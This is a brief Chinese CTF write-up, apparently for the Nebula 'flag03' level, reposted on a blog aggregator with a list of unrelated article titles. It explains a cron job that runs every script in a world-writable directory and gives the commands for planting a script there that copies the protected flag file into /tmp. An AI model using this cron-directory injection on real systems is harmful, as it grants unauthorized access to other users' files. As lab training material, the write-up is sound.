i春秋
来源:互联网 发布:读取股票数据 编辑:程序博客网 时间:2024/04/28 06:52
About
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
思路
先进flag文件夹看看
cd /home/flag03vim writable.sh
#!/bin/shfor i in /home/flag03/writable.d/* ; do (ulimit -t 5; bash -x "$i") rm -f "$i"done
程序逻辑
依次执行writable.d文件夹下的所有脚本,然后删除
根据题目可知系统会每隔几分钟执行writable.sh脚本,并且writable.d文件夹是所有人可写的。那么获取flag的思路之一,便可以是写一个获取flag的脚本放进writable.d文件夹里,执行结果重定向到/tmp中文件。
cd /tmpvim hack
cat /home/flag03/flag > /tmp/flag03
chmod 755 hackmv hack /home/flag03/writable.d/cat /tmp/flag03
As for the time, good luck for you!
0 0
- i春秋
- i春秋
- i春秋
- i春秋
- i春秋
- i春秋
- i春秋
- i春秋之戏说春秋
- i春秋之春秋争霸
- 171220 逆向-i春秋【***】-******
- 171221 杂项-i春秋【***】-***
- i春秋的戏说春秋writeup
- WP 4 i春秋_细说春秋
- WP 4 i春秋_春秋争霸
- WP 4 i春秋_2017年春秋欢乐赛
- i春秋:无处不在的SQL注入
- i春秋php代码审计-xss漏洞
- WP 4 i春秋_internetwache-ctf-2016
- 关于变量的声明和定义
- PAT甲级1006. Sign In and Sign Out (25)
- 根据数组里面数据的日期进行排序
- centos7 L2TP/ipsec vpn搭建
- 图片轮播
- i春秋
- kvm vm运行
- 我的CSDN的第一天
- Jquery选择器-基本选择器
- spark.eventLog.dir和spark.history.fs.logDirectory的区别
- ccs元素定位
- python解决乱码问题-文件
- 如何判断一段程序是由C 编译程序还是由C++编译程序编译的?
- 到底什么是闭包